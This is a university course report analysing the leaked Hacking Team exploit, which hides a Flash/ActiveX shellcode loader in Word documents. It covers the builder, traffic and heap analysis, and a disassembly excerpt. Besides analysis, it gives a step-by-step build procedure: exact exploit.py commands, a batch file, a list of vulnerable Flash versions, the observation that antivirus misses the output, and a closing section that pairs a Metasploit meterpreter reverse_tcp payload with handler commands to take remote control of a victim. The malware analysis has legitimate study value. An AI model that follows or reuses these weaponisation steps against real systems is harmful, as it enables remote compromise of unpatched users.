In this study(PDF), an exploit of hacking team affecting Microsoft office 2007, 2010 and 2013 has been assessed. The exploit itself leverages the capability of Microsoft word to render Shockwave Flash files and exploits a vulnerability of Internet Explorer ActiveX. Our reverse engineering of the SWF file (shellcode container) shows that to the best of our knowledge, this exploit is different than other analyzed Flash Player exploits. Unfortunately after 3 years in 2016, out of 54 Antiviruses just 1 is able to detect the maliciousness of the document. In other words if a user receives a malicious Microsoft word file – like the one we produced – and she has Avira, AVG, ESET-NOD032 KasperSky etc. updated to the last version, she will not be able to detect the maliciousness of the document and she probably will open it. Furthermore during our course of exploit testing we found out that this exploit can still work with 2015 flash versions (refer to Table 1(list of vulnerable flash versions to HT word 2013 exploit) for the list of vulnerable versions we found) and office Word 2013, Microsoft published an update to patch this vulnerability after HT dump went public, installed on a Windows Seven 32 bit. This vulnerability however, is patched on the last published flash player version we tested (refer to Table 1). In the rest of this report we first review our static and dynamic analysis of the exploit builder and the shellcodes and then we combine these two results. Finally we describe how to build a Microsoft Word exploit using Hacking Team published source codes.
In this section we review our assessment of the exploit builder (ht-2013-002-Word\exploit.py), the bin ActiveX file (ht-2013-002-Word\resources\activeX\activeX1.bin), shellcode (ht-2013-002-Word\resources\shellcode) and the final produced swf file. Because of the coupling between these resources we analyze them altogether.
The HT word 2013 exploit comes with a builder. The builder is a pythin script, exploit.py, that integrates shellcode, payload and docx file and produces swf, dat and the malicious docx file. The final outcome of running this exploit can be anything depending on the loaded payload. The Figure 1 will show the exploit generation process:
Figure 1 (HT word 2013 exploit generation process)
Embedding Activex and ShockWaveFlash exploit
This exploit embeds an activex binary which in turn runs a shockwave flash file. The shellcode is actually in the shockwaveFlash file. To do this the builder script loads the input docx file, unpacks it, adds the required bin file and then again packs it simply using zip.exe. This is possible because of the XML media files standard that word follows.
Docx files are actually a package of all the media files that you may see in a docx file. If you unpack the file – either by using an unpacker or changing the docx extension to zip and unzipping it – there are several files and directories in a single docx file:
Figure 2 (docx file unpacked)
Explaining all the files and their details are out of the scope of this report, for further info you can refer to ISO/IEC 29500 standard, however here we explain some required parts for our analysis.
The ActiveX bin file will be copied into the media folder finally but in order to load and run it by Microsoft word the exploit builder updates the [Content_Types].xml (to load the components to run SWF) and rel links in the _rel/ document.xml.rels:
Figure 3 (Add Activex loader component)
Finally to place the Shockwave flash file in the doc the exploit updates word/document.xml file – file which contains the body and content of the docx file – to render the swf:
Figure 4 (adding swf loader to the docx)
The exploit has a very well-engineered design meaning that the shellcode itself is separate from the executable. In other words the shellcode file is the just the first stage to load the final payload (RAT). During the building phase, the shellcode will be inserted to the swf file. Here is how:
Figure 5 (exploit.py SWF preparation)
At the 1 highlighted part (Figure 5) the shellcode offset in the swf file is read and then at the second part the content of shellcode file is read. Afterwards the shellcode will be written to the swf file. After integration, the swf will be like this with the highlighted part containing the shellcode:
Figure 6 (Shellcode opcode)
There is another level of parameterization and that is reading the malware installer from the network:
Figure 7(exploit.py and shellcode parameterization)
As you can see from the 1st highlighted part, 8 bytes from the start of the shellcode file is the location of the server payload file. After inputting the RAT exe it creates a dat file with a random name and here the address of that dat file will sit. Other parameters are initialized accordingly like what you see in 2 and 3(Figure 7).
Finally the Activex binary file to execute the swf is modified so that it reads the swf file from the server – it will be inserted in 3 places :
Figure 8(setting swf address)
These lines find the 3 http texts in the bin file and replace it with the server swf address:
Figure 9 (the bin ActiveX reverse engineered)
Finally two packages by running this exploit will be prepared, one to send to the target and one swf file and a dat file for the server:
Figure 10(packaging the ouput, exploit.py)
To invoke this exploit builder the user should invoke it like this:
python exploit.py payload:http %URL% "%OUTPUT%" "%FILE%" "%FILENAME%" %AGENT% %OUTPUT_SERVER% %SCOUT_NAME%.exe
In the following section we explain each parameter:
- URL: is the url that will be called from the victim to download the malicious agent
- OUTPUT: name of the zip file to generate with malicious document
- FILE: input document to modify
- FILENAME: name of the malicious document for the victim
- AGENT: name or path of the RAT or Trojan to inject to the victim system
- OUTPUT_SERVER: zip file generated for the server [contains encrypted malware and malicious swf]
- SCOUT_NAME: Name of the RAT when will be installed on the victim machine
A practical usage of this example is reviewed in Requirements to build the exploit section.
In this section we mainly reflect the results we got by manual dynamic analysis of the exploit (In order to learn about the exploit production and our testing environment please refer to Exploit Testing Section.) In a nutshell when the user clicks the docx file this course of actions will happen:
- Word loads the components to run SWF file
- Word asks internet explorer to download a SWF file
- Victim guest downloads the swf file from the web server
- Word gives control to installed flash to run SWF file
- The swf file exploits a vulnerability of flash activeX and place the shellcode in memory
- The shellcode starts to run
- The shellcode will download the dat file
- The dat file will be renamed to the HEYFINDME.exe (we provided this name for exploit builder)
- It will be placed in the startup
We first started our analysis by examining the network traffic using Wireshark. Afterwards we used memory usage graph and Procmon to analyze the series of filesystem, registry, network and process events. Using the data taken from Procmon in conjunction with our previous result of static analysis we used WinDbg to dig memory.
Network traffic analysis of the Word 2013 exploit
To analyze the network traffic we used WireShark and to find the exploit traffic much easier we used a filter to show the HTTP requests since from our static analysis we knew that the exploit tries to connect to a starting http:// address. The fitter was “http and ip.dst!=18.104.22.168” which simply just shows http traffics and removes those going to the multicast address. After clicking the docx file we could spot two requests for swf and dat file (Figure 11 ). Moreover we could match these traffics to Word process using ProcMon TCP operation filter
Figure 11 (HT Word 2013 exploit traffic analysis)
Figure 12(Word exploit TCP send request)
The first request will be issued with non-vulnerable flash players on Windows XP as well but the second will be only issued if the exploitation is successful. Another interesting point that we found is the behavior of clicking the doc for the second time or in case the swf is not accessible. In the former, the file will not be downloaded because the server returns 304 status code. In the latter the request will be sent and the exploit works as expected.
One of the probable cases for these types of exploits is heap spraying and if it is huge it is easy to spot it in this stage since the system is still not compromised and the given data is trustworthy (Figure 13). Our analysis shows that the memory graph does not show at least any obvious abnormality.
Memory analysis after clicking word 2013 exploit
Using HEYFINDME text which we know it will be the name of the payload file on the victim system we found out several events in Process Monitor
Looking at the sequence of actions it is obvious that the exploit tries to create the Trojan file in the startup folder. Therefore at the time of clicking the word file no malicious activity will happen until the next reboot. By opening the event we traced the calls to this event and as expected some caller sources are not known (In section Heap Memory analysis we analyze these addresses more):
Figure 15(stack traces first trial)
One important observation that we had was the success of the exploit with presence of ASLR. We ran the exploit several times with the same parameters but the stack addresses were different. The next screenshot proves this:
Figure 16 (Address fluctuation by 32MB)
What we realized is that the exploit has a precise method of getting the shellcode address because in our Heap Memory analysis we haven’t found big NOP sled to make the random redirection possible.
Heap Memory analysis
After finding the events in ProcMon we used WinDbg to look at the memory more closely. After attaching the WinDbg to Word Process we examined the loaded modules’ addresses (Figure 17) in order to speculate about the possibility of the source of suspected addresses.
Figure 17 (word exploit loaded modules)
Since the suspected caller is in none of the loaded modules we examined heap using “!heap” command:
Figure 18 (heap allocated memories by Hacking team’s exploit word 2013)
As you can see in Figure 18 the caller address is near the last allocated heap. This attracted our attention and we more analyzed heap allocations using “!heap –s command”:
Figure 19 (Hacking Team's word 2013 exploit heap stat)
As you can see in the stat, all of the 2 last allocated heap chunks are used and then 1016/1024 are freed for 0a650000 that give us hints about the heap corruption vulnerability. After this we tried to analyzed the last heap slab more closely with command “!heap -stat –h”:
Figure 20(HT Word 2013 exploit memory corruption)
As a surprise the command returns nothing. One strong possibility is that the heap header is overwritten because of an overflow.
After analyzing the root cause of the vulnerability we tried to dump the shellcode in memory. To do that we used the data from Static Analysis section of this study. Using the byte code of the win32 shellcode in the disassembled swf file (Figure 6 (Shellcode opcode)) we started to dig the memory.
First we tried to match the first few bytes of the shellcode using “s -b 0x00000000 L?0x0a45923e 81 e1 ff 0f 00 00 03 c8 83 c1 40 83 c7 40 83 c6 40 51 57 56 e8 a0 fe ff ff c3” command in WinDbg. The result returned 6 matches. We tried to trunk the results by searching for middle bytes; the result returned 5 matches. Finally we tried last bytes and we got two matches:
Figure 21 (HT word 2013 exploit shellcode hunting in memory)
By examining the assembly codes in the matched areas and comparing these addresses to ProcMon result (Figure 17 (word exploit loaded modules)) with confidence we assert that 0a459100 was the start address of the shellcode – for that specific analysis since because of ASLR addresses change – and 0a45a36b was the end. Using these two addresses we dumped the shellcode to a file using “.writemem c:\shellcode.dump 0a459100 0a45a36b” command.
Now that we are certain about the place and addresses of the shellcode in memory we can match the ProcMon events to the shellcode Assembly code.
Mapping dynamic info to shellcode source code
According to ProcMon, a series of events to query the startup folder contents can be seen (Figure 22). 0x87F far from the start address of the shellcode (this address can be used to find the byte opcode in fla disassembled file), you can find a portion of code that is responsible for this. This portion starts from line 720 of the equivalent asm file:
push 8000h push [ebp+var_8] push [ebp+var_4] mov eax, [ebp+arg_0] call dword ptr [eax+80h]
Figure 22 (startup query events)
By checking the stack trace this portion has been called by line 1600 (0xFC5 from start of the shellcode) that is:
lea eax, [ebp+var_88] push eax call sub_801
This line has also been called by the last line of the shellcode that proves the previous portion is the main flow of the shellcode. As you can see in Figure 22 after this requests we have TCP requests that suggest here the download of .dat file (RAT or Trojan as you wish) will happen. This means this process will happen in following lines after return from “startup folder query”.
The call to the creation of the RAT exe file will happen in line 1628:
push 0 push 80h ; '€' push 2 push 0 push 0 push 40000000h push [ebp+var_90] call [ebp+var_14]
After that, writing to the file and closing it will happen successively in line 1638 and 1640:
push 0 lea eax, [ebp+var_94] push eax push [ebp+var_98] push [ebp+var_8C] push [ebp+var_9C] call [ebp+var_10] push [ebp+var_9C] call [ebp+var_74]
Finally the shellcode will return in line 1655:
push 1 mov eax, [ebp+arg_8] add eax, 282h push eax lea eax, [ebp+var_88] push eax call sub_E6B
The exploit, as mentioned in Exploit Builder section, will be built using the docx input file, server address and the final Trojan (RAT) to be installed – to see the complete parameters refer to Exploit Builder section. In order to running the builder successfully, a series of pre configurations are needed; otherwise the builder fails. These configurations are explained in section Requirements to build the exploit. On the other hand to run the exploit on the victim, the vulnerable applications should be installed. This will be reviewed in section Requirements to run the exploit.
The steps are as follows:
- Install Python version that suits your host (2.6 or 2.7 for 32 bit version or 3.x for 64 bit hosts)
- Installing python easy-install by downloading ez_setup.py and running it
- Install pylzma library by:
- Downloading the package
- Explore to the container folder
- Issue python -m easy_install pylzma-0.4.2-py2.6-win32.egg command
- Install zip.exe package which suits your host
- Add the bin folder of zip package to your windows PATH environment variable
If all the steps are successfully taken, the exploit builder (exploit.py) can be invoked using a command like this:
- python.exe "F:\Codes\vector-exploit-master\vector-exploit-master\ht-2013-002-Word\exploit.py" payload:http http://10.20.20.111 Trial1 "F:\Codes\vector-exploit-master\word input\expolitable.docx" tricky5.docx "F:\Codes\vector-exploit-master\word input\calc.exe" Payload7 HEYFINDME.exe
For test purposes we suggest to use a bat file because the exploit is one-shot and after one usage it is useless. Therefore for an analysis the analysists may need more than 10 exploits in different times and inputting the options can be a tedious job. Our bat file was like this:
set "curpath=%__CD__%" F: REM: Our exploit scripts are in drive F. Change this to yourscd F:\Codes\vector-exploit-master\vector-exploit-master\ht-2013-002-Wordpython.exe "F:\Codes\vector-exploit-master\vector-exploit-master\ht-2013-002-Word\exploit.py" payload:http http://10.20.20.111 Trial1 "F:\Codes\vector-exploit-master\word input\expolitable.docx" tricky5.docx "F:\Codes\vector-exploit-master\word input\calc.exe" Payload7 HEYFINDME.exec: REM: Our batch file is in drive C. Change this to yourscd %curpath%
After running the builder 6 files will be produced (Figure 23):
- one docx file which contains the exploit
- one swf file with random name that contains the shellcode
- one dat file with random name that contains the Trojan to be installed
- one tmp folder that is unpacked version of docx file
- one file without any extension which further will be reviewed in Exploit Bug
- a zip file that contains swf and dat file
The “Trial1” option that we provided in the exploit builder input will be used for a zip folder in which will be the docx exploit. That zip folder is 20 that does not contain the zip extension. If you provide .zip extention in the builder input, the builder fails because in one part of the code they assume the input has .zip and in another not. Two lines are (314,315 in exploit.py):
os.system("zip.exe -r \"" + send_to_target_zip + "\" \"" + output_file + "\"")shutil.move(send_to_target_zip + ".zip", send_to_target_zip) # ‘+ ".zip"’ from the first argument should be removed
There are 3 .yaml files in the ht-2013-002-Word folder that seem giving info about the exploit and vulnerable apps. During our course of analysis we found out those info to be misleading. They mentioned flash player v22.214.171.124 as the first vulnerable version that is not true! We tested this version of flash player with Windows seven and XP (in conjunction with office 2010 and 2013) and this version was not exploitable. The first vulnerable flash version we found was version 11.5.502.146 working both on windows XP (we tried office 2010) and windows Seven (office 2013) though we were mostly using 11.5.502.146 version for our analysis. To run the exploit successfully, one also needs to install a webserver and upload the shellcode and the payload. In our case we used Xampp on a windows operating system. To recap our working environment for Windows XP x86 was:
- Windows XP x86, service pack 3
- Microsoft office 2010 (to be installed on XP)
- Flash player with activeX version 11.5.502.146 (to be installed on XP)
- Xampp server with the server IP mentioned as parameter for exploit builder and having swf and dat files
And for windows Seven:
- Windows Seven ultimate 32 bit
- Microsoft Office 2013 Office Professional Plus 32 bit (15.0.4420.1017)
- Any flash successful version from the Table 1(list of vulnerable flash versions to HT word 2013 exploit)
- Xampp server with the server IP mentioned as parameter for exploit builder and having swf and dat files
Flash player 11.5.502.146 (with activeX version)
Flash player 11.6.602.180 (with activeX version)
Flash player 126.96.36.199 (with activeX version)
Flash player 188.8.131.52
Flash player 184.108.40.206
Flash player 220.127.116.11
Flash player 18.104.22.1684 (last published version)
Flash player 22.214.171.124
Flash player 126.96.36.199
Table 1(list of vulnerable flash versions to HT word 2013 exploit)
We tried several flash versions to track the pattern of vulnerability in versions and it seems after the first vulnerable version, almost all versions were affected until the HT dumps. The last versions are patched as our analysis suggests. We also tried to run the swf file solely and infect the guest. In this case after swf running, the dat file will be downloaded, though it will not be put in startup.
In this study we analyzed the Hacking Team Exploit Delivery service for word 2013 exploit by analyzing the exploit builder they used to use the produce exploit for the customers. We analyzed the shellcode and its execution flow using both static and dynamic analysis. Additionally we mapped the source code lines to the dynamic data. Furthermore we found out possible vulnerability the exploit acquires using our memory analysis data. Finally we reviewed the setting environment, requirements and configurations for this exploit testing for two different operating systems and applications.
Although this vulnerability is patched both on Microsoft and Adobe side, the antiviruses cannot detect it. In other words if the user uses vulnerable versions her system may still be infected. This is probable because we could find 2015 vulnerable flash player and people don’t use to update the office versions regularly. On the other hand to the best of our knowledge a detailed online explanation of the exploit is not available and the root cause of the vulnerability that we claim is memory corruption can be further assessed.
Real RAT as payload
In this section we build a meterpreter payload for our exploit and then use metasploit to get access to the victim host. In order to do that we first need to build the meterpreter reverse_tcp exe. Open metasploit msfconsole and input following commands:
use windows/meterpreter/reverse_tcp generate -o LPORT=[your-port],LHOST=[your-ip] -t exe -f meterpreter.exe
[your-ip] will be the ip of the system that metasploit is installed on, something like 192.168.1.1.
Then input meterpreter.exe as your tool for the exploit builder:
python.exe "F:\Codes\vector-exploit-master\vector-exploit-master\ht-2013-002-Word\exploit.py" payload:http http://[your-ip]/[the-folder-that-contains-swf-and-dat] Trial5.zip "F:\Codes\vector-exploit-master\word input\expolitable.docx" tricky5.docx "F:\Codes\vector-exploit-master\word input\meterpreter.exe" Payload7 meter.exe
After that open your msfconsole and input followings:
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.56.1 set LPORT 88 exploit
After executing these commands your metasploit waits for the victim machine to connect, which will be a restart after opening the malicious word document. You will be prompted with the meterpreter console after the restart.
This Report has been submitted in Partial Fulfilment of the Course Offensive Technologies, Università degli Studi di Trento, Master of Science in Computer Science, EIT Digital Master of Science in Security and Privacy. To download the PDF version of this analysis please click here.